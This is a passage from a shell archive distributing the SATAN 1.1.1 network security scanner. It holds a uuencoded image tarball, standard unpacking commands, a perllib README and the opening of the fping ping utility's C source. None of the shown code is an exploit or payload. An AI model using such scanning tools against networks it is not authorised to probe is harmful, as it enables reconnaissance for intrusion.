XM06JEK;:H-.B6*:>H$CJC;>FH+=3^?)F6)C#YJ)7*F)])FA,8J2+&J92*DQ69
XM1JD)J;WEHY.HGD7FE:"JJJOH.ZU:=+/JJ9^:JJ\:@8.J=2J9B>7QEKUJJZZZ
XMH)QHF8Z)IQ2*J[@6J[@PK//IJR77K&)J@]"JK&MHF@(5JKFJJWTEG,,YK7,C
XMJ!J)H.[YI^)YK R)K=%9F>-:<,#*KN<JE8*IKJ9*BM@1K7\*KUK3K*=X'/NJ
XM!E+'&-UJK=\:*I@JIRJHG@3)D.!:IH+X8;C:KU&9K<\I)M4)BP'KKN@9J+QZ
XML)::L K[I9,JI<[*1!$5:J:*F*5*I,YX;HX1IJI9L5AGF[88(S(ZL#5KLZK*
XMBU,2L5W^YVE&^JH\6V\""XGJ1I6I:;2Z4J':*G.9UYI-.T0<"K54:P5OF:@[
XMB++91I1:"B=8.UI/ZX"_V; B6&Q!6[:[FI7FV$@=N[9/REL6F;8L&[=L>[9H
XMNVOH>K=#JK8S:;5]B[>=&H,.*KAV6JVL%++8<KB(&ZXL:;B-2Z]\J[>1*[FP
XMZHT =+F#2XV,N+D02XR6^+F8F[FB.[H2V6:G.[(2H[JH:X"M*[=M*D?&5ZSV
XM!+NQRX'B^EU;<:\M,THG])^U.Z(3]UM(%FE1*T#P>0M:!;JE*;;4&;PCYV8Q
XMMJUHFR"EDA7%5[VI)[Q'X$/,1K!<U9'1.W.-&;[6U;WOMIW^FOEIO):GR<B<
XM5+"[EE989_J?_%H[)IMGA_HCZWN_^/N\FDB^-!O 69N^*T? [RN*_YNTR*N_
XM8$NK!9P^#;J;Y'? G7B5A$A[ VO!%+RSSG?!,%:>O)NZTDFFVL>Z<(A@$FS
XM*?RNH).<_ONZ8@=,S8NC-\P]?$FZ+@O!\6*>A;J/.)S#V G$'CC#O[I=.NF%
XM5-JD[LO"[/3$5]9RQR;$LNNOO!'"RVNO@#6Q=1<R3#P2(9/%3^.Q[L7#HK 9
XM4?RC'&S&<_J>;9R[SY,6:CP\(WQL^7MV8UPIP.G$C*5!XXM"Y*IK6^; 5+6'
XMYV)E./3#+WN^PZ?'_8;'MPAKN9G^<W2\#(<,;0H,R3L:G#)AR<XIM93,OO0B
XMRG/WR0&JHE"P8::6<5E\RL2UO2?FES#VRC8LEK7Y9:Z[O-U;R\.[3M3BECQ7
XMN[T\O- K7;J,BK5,S-[[=5N&N[IX=-N93 CJ<PLHLMLS7*)>4VWO<4LS?A)
XM1H)DR=C,)[^,-:U$QT37JMU,9EJDR7D9O/4D,NK<S>6LO% \6SSTSKAIH*J,
XM%UM+R_7LS?$<B]S6C;JHS(_<RO(;%=C3RL,\RT$LOW$3<N7&RQI'SCWDPW5V
XMEQ4AT+T8.AD]=T-\S(;Y$Q_MS^VK'D8GRWUJBB)]9 !=#Q0(<#5J;HW,K0B3
XMO!AH';?^^6PH'2]2HA>9&J$KEJ3S>U^SH]")JX0R-+?U^\?V0[/BJ\'SD(:M
XM!=3>MM39%J*Y5-7FH*-B''BW>UQ;/4X+Z#-9+2YDO2SD6(!LC7FARVI["]>X
XMU0S01B1F/0_OJ&(Z5->7_"[<&]&DY]6Z1XSOL2"GJG2AI-8GJ-?J)6=)1\.S
XMAE\PO<;)6,W[_ ,G.G":O6G96&R(/<6#W&L,'+H +=,]<\>>O<"@'=F*G;63
XM]<=WQMK)['&SC6N-38($Y=:N)=F"S-MW?3U=Q2N0]-@/NFNIC<:0=-<PJ]P3
XMR-SO.%7$_<:]=-PBMT0X=JAP*]7<D+"_K9W69-G.V=<PF\'^__6%U]UGAS9*
XM[/E3(*S>AB+9NJUDG#O>S)R/1D3<16K+]YV(I6LRB;VDF67+!$T,878O]$TV
XMJXO,J9Q@6#9DBUO&NN'?'1'?LH-+X)V7<*IE%SY6B1IP)JI?%6[A!Q[AYB+A
XMVPU?'7W/B/4?EY3B*GZ7"HY,WOA*4X:P9>7A[^;A+S))JJVTZ(O48V;B 1XB
XMFLAGA$GBE\UY/*53YIW2_#GD!4["@&T)HOU&-.JW'5YCKPQ.X#2FC@MN&U3;
XM8;FI2)JL\T>?0B>0 D[70XC%R+NI,(77;VZ#8BQSYQ'-!#FN-)Y 2J7GT:Q"
XML(VJ:6PX6 U;L!3C);L8D>SE5I/^V.P7;-V6T&BFX6V8'2N<Z F.M4ON<W^>
XMR7[NF3L^='^.;3=FW*#N13=&ZL;<)B]^T//Z)@F=-Y<>LZW>-//S4L\KZFJF
XMZJ:TC+W^<MY66BUYZ[@NQ;H.2\(.7D91YF=L6IWT[-);V)2-[$VYZ:LRG_E4
XMV@/#[-"<,6"^LS7:M;K7RR[U'[4X[?!=K-Z1[N5^M=<>U.>^M4TFXM*W[MMN
XM)[$.I=^'TU"Y9_;>EO*.RXN>>F.+3<]*\+"<CL\%ZR].Z-*Z\,)<:,1.'\55
XMEA,OO84SS#>>2;*>Z3;%#B'":$:;[V#=&/"N69PN2U3[[1#93.S0+<XFMIY>
XMSM J\Q#^UO(:;PUOV_![[M",^M=ES=[/+61CZQE#OVY'%6>./.A)K_3YC.(_
XMO^==4D8VO])!E#<&C^KI0N!13\6O >DC#Q]AR/.9ZU73G;X? MYG_^ 9)AD1
XM+X(?_N9N_PN(/39;GU3#C6]VOPN9!"3>^NI?W^!@SUS&GC&_5FAM[_<L&.FQ
XM=<#.I*^-3U5X#6F3EE3FQ;F&'\.K1.57'O=B2OE@9A9*O<-T[N.;S_GEX_GK
XMG?DETZ>KK[)!&G$W%_=V+O>P&]J@+/-$H_*C[\AUSOLYOTU"(?OCV&FH[/1#
XM5A;'+]0J7_C<FN$G;/BBG6:*CTL'B_7 8$"YG/F",F# G]/^T:_Z1U?OY![U
XMUV'EV)\]-JWT0.+LJ9#Z2?K7,1+_(<0C.RK^P =I]8W_($4 R#'3M/UAE)-6
XM>W'6FW?_00D8 V-D/C1<V=:ES-,LU:A^\5S?^=[_%2?$C4,B I')4$P8JQR5
XM4>F46E4*2UGH<[BU?J=&K!,&-I_1:?4!NP Q2&N,5VYCRFA/>IW?]_\7XH:R
XM5O8 #_6:V/)@#!$?(2-YVMHZC!@E,QMI4,C*-$%#15,$"5,"'4</%1<K151A
XM8V51M5(=+A=-9T$%\5QM=H.%'W]M@[J.AS-E.CTGC)6CI2<O2]^"H*>MG"@=
XML[7!PXMPO]FL5<K%KSB[?B&LU>/^Y<?3W70[S>?[X/+...@O.OU!9Q6Z1L^3C7<
XM"03#KQ0\8 HA1C37S-)!-^@DIHG3Q-DS@!E!2L*#28/#,;5"+O2G)9\%AREA
XMSAKY4H^]&:82Q@0B!B5)CSJ!RNS%HF&#G$%[;)S!T^5'I$^K="O2BF8^IU O
XM].+G\R=6KX!&YBIY9&,[KE]UE+V7H2I:MU'/%>I)4>S;'=56&FMKE^_.H17G
XMVM3:]^X=1GN-$E9\!7%-5S?.75T<J&4_O9,QLYVC5%=6* U-2L[,#/+8S*==
XML"J$T1]9T:,KKV3[&O5B2B6-LF[]CO9D7X,ZNQQ+FGCQXK5!'MVL&F?;WKXM
XMLH,&VGC^=3'5+5M_CMS/F&Q;<WE"O)TP.:O_M#=>K9U[M)-3;6)K3+XO1X8T
XML:M'<N=X>UBW-4OF)G:$\\^#W[!IAQG>X'LG->,,# XLM>:XYST""XQP _NX
XM(:Y \6YA(KQ;'*1G00TGI+#"0=0*JRD4-^R0JA5';,5&!CLC@K6Z),R--!CE
XM4.X9'IO3CS(@&SF.FQ4'+/' REZ9[4<DOU#$%LZ@Q- T*D-<T+X:2VQ2OO38
XMBQ(A(IL3H3\NDQ!R2 ZC XS-B1[CCQ"R)"S3M3O)Q 69V!@:SL,Y"UM*3E2,
XM#''.$TD\R<\Q^^NMM34;E3&Q1%PD=(F_8@0TT0?HBXE14,'^ Y/.3(_TBU(<
XMMY+-CE$UI0>X#6=%]= (80653S\G]0PN"$D\9C U;8TUD2RS8HG.U%#,%3B,
XM)CK/S02O07-6-*U[85!CC^W1#F5[?1!7(1^=DJI//V7R6DQ_A+8:CYSE5CYD
XM7Z0%AW2Q*G9=T*0SJ,$_LA766DA#K:^<4@W+H>!Y]+V35#B7.E@3_G14]M5I
XMD;RP7O'PS1 S9V\:<%(K=TMGX:3,#8^.>!=5<39["SLMIZ%&]DXVNCJ-9=L;
XM+SXY*(P%+@OH WUV+Z'/=L[.H(X[WL=+%N%MVK9T78WV!ZDCFMGB56F9:>":
XME$DY2:SY O"A@^[SF6Q]B@VMX3_^6<)Y2Z/%[IG*H5M":.UDW6(9899S\XFI
XM?P>JN\N]H0+:"[PW10OP(M_NTL:(GY3'<$@U5+Q?F-LL6A1;\4(;WW9Q.H7M
XMQQ^?VF2SPLCW)1U1U6O)THE6"/#4#9ZN5L1Q^WE:$8GBZ%E2LM87][=^WSSA
XMJ'2"M9GG*:K'%_"D]]QI_"+O&UV5>2>\>*VAES334G.6*-[C79<=<C.LOWX+
XMO;N?%\#J0SJ?\>:-?%?+;=I?XW9T[A<@,E2M?!FQ7P"3([7L[:=_:&A;<!:X
XMA#CUQ!(-=)]KXJ<.S5%'#1E$A/'$$L'@D:PC<TL)R! ($;QUR(/$TZ#Q."@%
XMSH2N=OC^<X<($V@(H5DM2!:,0L.HPZF=8$AN!115,7#XO61!SVG: "+\]+:.
XMZ)#/B$=TFP\A,321M7 ]=+O2#8O&G!*:$"BQ2^$+5^8PU@$,BPI33F3.-+@A
XMBHB WK,B/)+(L/'XZXR=:V,+R.4C %)K/V:I(ZT2A\0^%FY(<%LD _^XJ41Y
XMS6V0?-I9R%C&\3TR;#K$!"?]&$D3O6F-3L*D&P_#I\:E#S*@W,7]7.G'B25O
XM6?'A"A<Q1XZ/X/*5BA2E ^<#P%\N1R14T\^PKH8E*M[J*3.Q4PZ)%4)>HFR8
XMO&$<0427JVE*BY#5\HKS8ODY[,4IG&'8)BFFHY4^.=.2:;O^2C79B,=R+N.8
XM/!Q%'BU9KWX%TTLGN\Y]B*(]"N$S&. CXCE5-<P%!G%TET/E7R2#4)WYTG;X
XM>9@PYBDK+A@2:^AKG'=.F<EFSH^@$UVB1&7)OH:^IJ0FA%9 '6=&E&H$3Q<)
XMJ4GYYXUNWLN?C'(E/.,ISYFJU)2[*ES_:*D@E#%P@J(!:G?"$BXT-M*>1C-G
XM*IZ73*82Q*E/A2H?,UJ'F;'0J]J2Z#7#NE-J"*ZK=I'I4*^J*_C%XYRP3*M:
XM"\4Q<2&/I'<]PU%:!=><^B"I5?4+4[?65K=>T8F,Y=Q4T^*FP"*UI\Z@35G=
XM)TC,HO-2B@I(.>TJQ,..MBAF72S^IUJ:HJ9LEIH/TFDIOQ;9K?)KKWQUEU^I
XM0"[@571M$60B7I>:T,DIK&RE32U47W'(TREP/#EZG>?J:BAZ2?"TK<0M8RJ6
XM-\&*E6GJB2&I?EC9+1*WNKO;KFSE"MOOI1.K2E53>/-91)C:%G;7594I[9O%
XM_#7WD\&$[QPMA,K34L:C$VID?B/Q._\^EJJ(U2IM33M@S>(T6.H]X5X"*<C-
XM_#>97$U+<85ZWA&^:G]WK.]K:[EAQD R<.25\)A4$4@$\\)%FE/0=Z#KSU2V
XMD+7</?$]QTG!D79C#S5N&DJW.2H/BC@48&0RT6#7XJ]\::,6?ID4.RQ-]+X8
XM4>(\<(_^>_@)=>X2NHA%IEG!W$&*TEA7YP%QC/9V5O&:RK7E*=>,1YPDVV+*
XML&\(8T^GZ$8\3]2Z:;;R0?FJT=J.=H@$$M]-D;+F8E8X5=_<X[P$[&#"TM%;
XM4/9-H>FIPR=_<#[2W(Z<\VF/1=OY68/VM)1W.V0:I175AQ59A#\-Q4EW5KZ:
XM++)T[UKK!]/9SS*#8IH5G#Y%!U?32:%@1 T=SUV-6I_@=;5^-RK,9A.V33Q[
XM9[2E?6-L5SC6-EQM+82]Z<X%9I6H:=%Q4WJIW?BN@G(&=#O]5</:O/O:Q$PN
XMM7M8$'B+=,M7NU%'P;V*(!+#HGU.X*P'7L68;;72P_$/5P'^_MY-F%O,A][V
XMQ!N=IG&,*V3]]DQ-':["!2L%B]'%]S*KW1Z,;Q:,P.6MQZ+5<AUW>RT21XXN
XM30ZV,"6<&D4^$DCYQV@ NRSF%Q=FQB5G4Z-"$^*#'*RZ0ZGJ<\.(R#0O#83-
XMUUQ>Q:5*TSPK2;Y(]%V[%[F=]3A=2VUJ2N?6[.$]T]:YKFLVNOWMX2AL5N=.
XM=ZS/5NL:S]B8RZJUE$/V3=HNJN"9+5SE8OIN3T]\=E5Y\T_ ^&Q)CWR':6A-
XMM3?YZ>&V98GAOCCA+;[PD"\4=D4^X99QOHD/"3K=!;[@LK=VW267/:&Z[E67
XMS56/SL&@KU1"'B2_BZ&CC[$[GPK^V'FCL;U]E_+5"Y[0?$=<,5&]O37QZWR+
XM&[[+5RZ[\L]ND7_**TO<SW2;H<[[;[5Z=,!\_8II%W^!,/1Z9YE^8XWO<"HG
XM^>[/P7Z+_?*FJ?QG<5A/%B(GQ+SI_.ZB=3A-_'J)]@(.@JQ.&AZPON3BKYYC
XMJ)[& @MJLJ)/3,R+ [5(JER(J%SLOWJ-6_@-J,Q&C;Y/T%Z$!8L-!-\/]O(-
XM 2'J!BF/_'K)D[B'=ZRGYG@*]T(& 8\NQ0+N=1IPEKRK_+1%AF+G!6$0YHQE
XM:830YC;0 75O>>X%"Y7LLIC']YR0K;Y0W!2E#5^MRJ 0UUXN::@K\(AK,$CP
XM/R["_>K^#//@$,Z6B.T^; N!9;Z28=/T$ @+C08!"_6**>X.<!*PD& 4R^:N
XML/3DA5_\\ ]+8PJ_"L5.1:M^Z&&0L _G;$8VD7HZ$9"8#O!"3:<F<?#6[?%:
XMT*'0+)4@C>L$L/\L:PY)K0HQT. J<8[ZZ;Y.+U8&JA5=D3F&4.&.:<QDR)SJ
XM<!=78WBL$5<<YD0<\;G*S?0V#AA#CL.HR<.RS N[T+F<4<W6<115RT20RO7D
XMK_5>[]V4L4D*#/?6Q0V_JNI\B+)(\?K*43"4L1>#"@713?]\"_%VCQKA@O"T
XMK&7X+T6X$!>9$,>"KH&V2VUX!6Z:Z0HQ!QI_[09Q:!8]SR'^<ZOW5$W_&"DD
XM*7*Z3D7GG",1\_'SL"PEVVEWV,2Q1%*Z#F?0+#(1)X@'<;(,PY$4P8I+-BD0
XM3;'38A*A[) FAY$HBQ(ES]&R]O =IS*H((UK>*HF*8:[MN$DSQ%*LG+OU)$E
XM31$A-8L9@U)@Q)&FQO(A(1+L#,3)U'(MG1)1:K)G+H,?]Z%*R%(1,P\FW8V*
XM^O+\Y"AJWI)8\N?WVHYY]-',S/(LPTPO8W&2RH1=]BMBF+$'R3$TU:V(N+#[
XM8.XS%7&EUBD]^(8OP>S:! LJO>\9/X;IW)$*+^GD5K,QD84WY7(P\4_RVB\O
XM(Y$>AS(25^@GR<3/F'+SY%$TUVK^<QC,SGZ0+X&LP%ZJ+<D,-0D3.&OQOEZQ
XM.1E.VQKQ^;"3P&)+,Z*R.+WSXPJ02+BSL?#P-J^3&SLN;L9(4(ASM6)S+G.2
XM1^)3!3]1.87"7":O\ 3NQO;0-T'2*A^L:L03'(5204MP6TH3D "S"$60+@M)
XM#0/4JAYO/<W3/@US!]$& '.,0U-3#R.T_X3EQ/83RJ8D+_(L+H?A0RON)HON
XM2_XI1M5,0#0P,9&31"\4SGR468)S&@=/KV+2T@:40,5A,[-Q0D_4<M...@R.ELG
XME.2&03\KNX[M2%WK$+$E,4P03$=HIN!J^<Z,/F&B&/*$2S%J-UG!"T74B_ ,
XM(-=A39O^M$WC:"W-=$?E=#F+[T"Q5$>'S2,MT8 ^$1_KM$L#%3L<U063U-8*
XMTT\MT_RR\RFK2THKZJ\<]%!+5%.+3R"S:0WC=-3:IRH>+5,=LT573?1PU%2_
XMTX&L4F/"5,@XT^^H)TA=5595; '-$%+1#$N6HU?U;4+AU%<-3"RQ*V"&%5%U
XM\U)!,5F5-3(O4TO;17S"4$K^5.AHAT*K52BL5?MN!KV*E#$75+1<4UI-]9<2
XMAMJ6K ;KK5NCKD<:-5S73J7$5%)-RS:-=/1LU37Q]0)I"A:!*01+2Y+HM1T%
XM=F#_XPO%<YZDXDS!5%X;UF&ODP\B-E[5%9U\5,%B%6,%3?C^\E)BS2-,O6XD
XMC55DZ]5%:V]D]U%A259E5Y9E<S2S7G8)"75>X<EB+]9F\Q4:QU5<%I-B%Y!F
XM:Q9H0S4#<[;.<+49496?DE9IIY0=A]9HJY9;01!IJ3;4QM*82-9THBX_L?:J
XM1"UDN[:+[.Y>6_9H3::2SM5C4]6[A#1M591<*64D+P@CHVQGU^//T&-JNU9-
XM0ZQ1U9)M"<9'0)$YDXQNT=9NVXW%_'*=#M)9E<I"U7!%Y[%5V=57[>U?$?=@
XM U5!UR]K911AL:IN(?<Y=Q01,Y-R2=<<A2L7^9->T];L'I?ALNEH@,7>>FL%
XM<W=UXW!85==*=6NWOBNO9)1;.U?^63/(*W_.3GI44)D7@;"S>(6W&&666JDS
XM?)[R487U7\4W>Q/L8#AU)SMV;-AC.]$J>,EW>8LU=)OE&'VLN]SW?>'1^,+7
XM.(&$G=R6?^T&?U]W-;G--"M5,1$S5P68]/JD/O@.!^,64-G7=A=X72G84VW*
XM+;TF6!MN%[FW@D$X9D5'>4W78P,'F]2W>4-XL2R1B_Q7@KL*>U<XA".%/B;V
XM*_&29U5XAC=526S89^6V5HBM=G>8A^F+2'$7@.-7WK;7B)TX?FDF!I=P:0,X
XM:.3V@I\X>B_$4*[T*R'1+U^TBSD3B[-XWVI,91;W;\_VC-.3B 6WC)VN3/?I
XM<SDWO;;^MXCA6*#P(6 SJ=8I&BA&(_S.-&^]T_(=FT_HXU36) 'F9!WE^72
XM&&7'BF+)N)'O$I+7R"YA^(:(]XTMN7][9?WLL1R?J#JC588_>89)B(XNB6-E
XM;"_1U9-3.4K,> ;G%(VAENQH1I&ULY)G>?9&F%CUE&</+'_O]Y>%ET.$IT</
XM6#_O[H_;S%*/&9G)MY5K>)]&R=NVYI2GF9H%F.6RU4.(58&%4IT6F9&]N?)8
XMZ# &*7-;%4>H&'K3>9XE:5EXXIFDF$V'BTI;F)[]&8)))^>J%)- B&<F5QO_
XMN7ZF5S?@!+8VB=WJ^"@3>J)/.>>NX[' V696"'VZF:*S%V+^2B[T+"^& E<S
XM9=FC&?$W+AI22V8E1?AG3^Z+47JF'WF9=1)X[LZ483JF99JF/7IZ9C2@_3AN
XMXC(W7<J7?5HB+:-)*:9%(!I6A[>$DYJ:249II&.*QFC[5'<II[JKK>*J6\4*
XMA09!K/-TB<^KIYI'E5ELF)17C1F\T-JK5YJ++33S5!5\!R7*XEJNPQ*@9!<N
XM*P5\X66O^5JCF_J9]<<H5=KZ"/N?F8*LVAJ66W-&+II4&YNFUSI;:QH9KN1-
XM'YBQ+]N?IW>.12Y0)'MR@%JF3SJT[W%]P7J<*V91T?-O,I2UDYIRQQHAI7=D
XMT!,E?LRVX_H8IR<ANTYY_)I$.ZW^HX';;L5YI>V9LL69LE_46SYXN:FZ9KQ/
XMJ)4$+L4$1M'9NB_YL/LI=,*9E:$8O&U[M T[HQ_;N8%A7]&[L5F3K,Y%LY&&
XM->-[N?%Z1E^[EU$YOT4[6W!ZO*W$OP'\P G)F?#;S1(5P1W<@H.9N-NQNA]\
XMK_>[KT>XPC4\01::O;/[OS?</<(;0KBQ D$\Q(-;O"WE>[\;Q9W7M3-[M5W\
XM??4$^I!ZQJNYN=5/N7&<GEEZ=WL\R&$5+RA<R $\QGG<R!T;R96\R3$SR9U\
XMHE,[RJE<.6^\RFD8RK%<RF5\RYVXR[W<B*\\S,F\S,W\S-$\S=5\S=F\S=W\
XMS>%\G@L! [
XM
XM
XM
XM
XM
XM
XM
XM
XM
XM
XM
XM
XM
XM
XM
XM
XM
XM
XM
XM
XM
XM
X&
X
Xend
END_OF_FILE
if test 33901 -ne `wc -c <'satan-1.1.1/images.tar.UU'`; then
echo shar: \"'satan-1.1.1/images.tar.UU'\" unpacked with wrong size!
else
echo shar: Uudecoding \"'satan-1.1.1/images.tar'\" $24576 characters$
cat satan-1.1.1/images.tar.UU | uudecode
if test 24576 -ne `wc -c <'satan-1.1.1/images.tar'`; then
echo shar: \"'satan-1.1.1/images.tar'\" uudecoded with wrong size!
else
rm satan-1.1.1/images.tar.UU
tar xf satan-1.1.1/images.tar
if test -d 'satan-1.1.1/html/images'; then
rm satan-1.1.1/images.tar
else
echo shar: \"'satan-1.1.1/images.tar'\" tar extract failed!
fi
fi
fi
# end of 'satan-1.1.1/images.tar.UU'
fi
if test -f 'satan-1.1.1/perllib/README' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/perllib/README'\"
else
echo shar: Extracting \"'satan-1.1.1/perllib/README'\" $149 characters$
sed "s/^X//" >'satan-1.1.1/perllib/README' <<'END_OF_FILE'
XThese files were taken from the perl5.000 release. They are bundled
Xwith SATAN for your convenience; many perl5 installations seem to be
Xincomplete.
END_OF_FILE
if test 149 -ne `wc -c <'satan-1.1.1/perllib/README'`; then
echo shar: \"'satan-1.1.1/perllib/README'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/perllib/README'
fi
if test -f 'satan-1.1.1/src/fping/fping.c' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/fping/fping.c'\"
else
echo shar: Extracting \"'satan-1.1.1/src/fping/fping.c'\" $23240 characters$
sed "s/^X//" >'satan-1.1.1/src/fping/fping.c' <<'END_OF_FILE'
X/*
X * fping: fast-ping, file-ping
X *
X * Used to send out ping requests to a list of hosts in a round robin
X * fashion.
X *
X *
X * fping has been compiled tested under the following systems:
X *
X * Ultrix 4.2a DECstation
X * Ultrix 3.1 VAX
X * NeXT 2.1
X * SunOS 4.1.1 Sparcstation (gcc and cc)
X * AIX 3.1 RISC System/6000
X *
X */
X
X/*
X ***************************************************
X *
X * Standard RCS Header information (see co(1))
X *
X * $Author: schemers $
X *
X * $Date: 1993/02/23 00:16:38 $
X *
X * $Revision: 1.20 $
X *
X * $Locker: schemers $
X *
X * $Source: /networking/src/fping/RCS/fping.c,v $
X *
X * $State: Exp $
X *
X * $Log: fping.c,v $
X * Revision 1.20 1993/02/23 00:16:38 schemers
X * fixed syntax error (should have compiled before checking in...)
X *
X * Revision 1.19 1993/02/23 00:15:15 schemers
X * turned off printing of "is alive" when -a is specified.
X *
X * Revision 1.18 1992/07/28 15:16:44 schemers
X * added a fflush(stdout) call before the summary is sent to stderr, so
X * everything shows up in the right order.
X *
X * Revision 1.17 1992/07/23 03:29:42 schemers
X * fixed declaration of timeval_diff.
X *
X * Revision 1.16 1992/07/22 19:24:37 schemers
X * Modified file reading so it would skip blanks lines or lines starting
X * with a '#'. Now you can do something like:
X *
X * fping -ad < /etc/hosts
X *
X * Revision 1.15 1992/07/21 17:07:18 schemers
X * Put in sanity checks so only root can specify "dangerous" options.
X * Changed usage to show switchs in alphabetical order.
X *
X * Revision 1.14 1992/07/21 16:40:52 schemers
X * Now when sendto returns an error, the host is considered unreachable and
X * and the error message (from errno) is displayed.
X *
X * Revision 1.13 1992/07/17 21:02:17 schemers
X * changed default timeout to 2500 msec (for WANs), and default try
X * to 3. This gives 10 second overall timeout.
X *
X * Added -e option for showing elapsed (round-trip) time on packets
X *
X * Modified -s option to inlude to round-trip stats
X *
X * Added #ifndef DEFAULT_* stuff its easier to change the defaults
X *
X * Reorganized main loop.
X *
X * cleaned up timeval stuff. removed set_timeval and timeval_expired
X * since they aren't needed anymore. Just use timeval_diff.
X *
X * Revision 1.12 1992/07/17 16:38:54 schemers
X * move socket create call so I could do a setuid(getuid()) before the
X * fopen call is made. Once the socket is created root privs aren't needed
X * to send stuff out on it.
X *
X * Revision 1.11 1992/07/17 16:28:38 schemers
X * moved num_timeout counter. It really was for debug purposes and didn't
X * make sense to the general public :-) Now it is the number of timeouts
X * (pings that didn't get received with the time limit).
X *
X * Revision 1.10 1992/07/16 16:24:38 schemers
X * changed usage() to use fprintf(stderr,"...");
X *
X * Revision 1.9 1992/07/16 16:00:04 schemers
X * Added _NO_PROTO stuff for older compilers, and _POSIX_SOURCE
X * for unistd.h, and _POSIX_SOURCE for stdlib.h. Also added
X * check for __cplusplus.
X *
X * Revision 1.8 1992/07/16 05:44:41 schemers
X * changed -a and -u to only show hostname in results. This is
X * for easier parsing. Also added -v flag
X *
X * Revision 1.7 1992/07/14 18:45:23 schemers
X * initialized last_time in add_host function
X *
X * Revision 1.6 1992/07/14 18:32:40 schemers
X * changed select to use FD_ macros
X *
X * Revision 1.5 1992/07/14 17:21:22 schemers
X * standardized exit status codes
X *
X * Revision 1.4 1992/06/26 15:25:35 schemers
X * changed name from rrping to fping
X *
X * Revision 1.3 1992/06/24 15:39:32 schemers
X * added -d option for unreachable systems
X *
X * Revision 1.2 1992/06/23 03:01:23 schemers
X * misc fixes from R.L. "Bob" Morgan
X *
X * Revision 1.1 1992/06/19 18:23:52 schemers
X * Initial revision
X *
X *--------------------------------------------------
X * Copyright (c) 1992 Board of Trustees
X * Leland Stanford Jr. University
X ***************************************************
X */
X
X/*
X * Redistribution and use in source and binary forms are permitted
X * provided that the above copyright notice and this paragraph are
X * duplicated in all such forms and that any documentation,
X * advertising materials, and other materials related to such
X * distribution and use acknowledge that the software was developed
X * by Stanford University. The name of the University may not be used
X * to endorse or promote products derived from this software without
X * specific prior written permission.
X * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR
X * IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED
X * WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE.
X */
X
X#ifndef _NO_PROTO
X#if !__STDC__ && !defined(__cplusplus) && !defined(FUNCPROTO) \
X && !defined(_POSIX_SOURCE)
X#define _NO_PROTO
X#endif /* __STDC__ */
X#endif /* _NO_PROTO */
X
X#ifdef __cplusplus
Xextern "C" {
X#endif
X
X#include <stdio.h>
X#include <errno.h>
X#include <time.h>
X
X#ifdef _POSIX_SOURCE
X#include <unistd.h>
X#endif
X
X#ifdef __STDC__
X#include <stdlib.h>
X#endif
X
X#include <string.h>
X
X#include <sys/types.h>
X#include <sys/time.h>
X#include <sys/socket.h>
X
X
X#include <netinet/in_systm.h>
X#include <netinet/in.h>
X#include <netinet/ip.h>
X#include <netinet/ip_icmp.h>
X#include <arpa/inet.h>
X
X#include <netdb.h>
X
X/* RS6000 has sys/select.h */
X#ifndef FD_SET
X#include <sys/select.h>
X#endif
X
X/* externals */
X
Xextern char *optarg;
Xextern int optind,opterr;
X#ifndef SYS_ERRLIST_DECLARED
Xextern char *sys_errlist[];
X#endif
X
X#ifdef __cplusplus
X}
X#endif
X
X/* constants */
X
X#ifndef DEFAULT_INTERVAL
X#define DEFAULT_INTERVAL 25 /* default time between packets (msec) */
X#endif
X
X#ifndef DEFAULT_TIMEOUT
X#define DEFAULT_TIMEOUT 2500 /* individual host timeouts */
X#endif
X
X#ifndef DEFAULT_RETRY
X#define DEFAULT_RETRY 3 /* number of times to retry a host */
X#endif
X
X
X/* typedef's */
X
X/* entry used to keep track of each host we are pinging */
X
Xtypedef struct host_entry {
X char *host; /* text description of host */
X struct sockaddr_in saddr; /* internet address */
X int i; /* index into array */
X int num_packets_sent; /* number of ping packets sent */
X struct host_entry *prev,*next; /* doubly linked list */
X struct timeval last_time; /* time of last packet sent */
X} HOST_ENTRY;
X
X/* globals */
X
XHOST_ENTRY *rrlist=NULL; /* linked list of hosts be pinged */
XHOST_ENTRY **table=NULL; /* array of pointers to items in the list */
XHOST_ENTRY *cursor;
X
Xchar *prog;
Xint ident; /* our pid */
Xint s; /* socket */
X
Xint retry = DEFAULT_RETRY;
Xint timeout = DEFAULT_TIMEOUT;
Xint interval = DEFAULT_INTERVAL;
X
Xlong max_reply=0;
Xlong min_reply=10000;
Xint total_replies=0;
Xdouble sum_replies=0;
X
Xstruct timeval timeout_timeval;
Xstruct timezone tz;
X
Xint num_waiting=0; /* number of hosts we are pinging */
Xint num_hosts; /* total number of hosts */
X
Xint num_alive=0, /* total number alive */
X num_unreachable=0, /* total number unreachable */
X num_noaddress=0; /* total number of addresses not found */
X
Xint num_timeout=0, /* number of times select timed out */
X num_pingsent=0, /* total pings sent */
X num_pingreceived=0; /* total pings received */
X
Xstruct timeval current_time; /* current time (pseudo) */
Xstruct timeval start_time;
Xstruct timeval end_time;
X
X/* switches */
Xint verbose_flag,dns_flag,stats_flag,unreachable_flag,alive_flag;
Xint elapsed_flag,version_flag;
X
Xchar *filename=NULL; /* file containing hosts to ping */
X
X/* forward declarations */
X
X#ifdef _NO_PROTO
X
Xvoid add_host();
Xvoid crash_and_burn();
Xvoid errno_crash_and_burn();
Xchar *get_host_by_address();
Xint in_cksum();
Xint recvfrom_wto ();
Xvoid remove_job();
Xvoid send_ping();
Xvoid usage();
Xint wait_for_reply();
Xlong timeval_diff();
X#else
X
Xvoid add_host(char *host);
Xvoid crash_and_burn(char *message);
Xvoid errno_crash_and_burn(char *message);
Xchar *get_host_by_address(struct in_addr in);
Xint in_cksum(u_short *p, int n);
Xint recvfrom_wto (int s, char *buf, int len, struct sockaddr *saddr, int timo);
Xvoid remove_job(HOST_ENTRY *h);
Xvoid send_ping(int s,HOST_ENTRY *h);
Xlong timeval_diff(struct timeval *a,struct timeval *b);
Xvoid usage();
Xint wait_for_reply();
X
X#endif
X
X#define bcopy(s,d,l) memcpy(d,s,l)
X#define bzero(d,l) memset(d,0,l)
X
X#ifdef _NO_PROTO
Xint main(argc,argv)
Xint argc; char **argv;
X#else
Xint main(int argc, char **argv)
X#endif
X{
X
X int c;
X
X struct protoent *proto;
X
X /* check if we are root */
X
X if (geteuid()) {
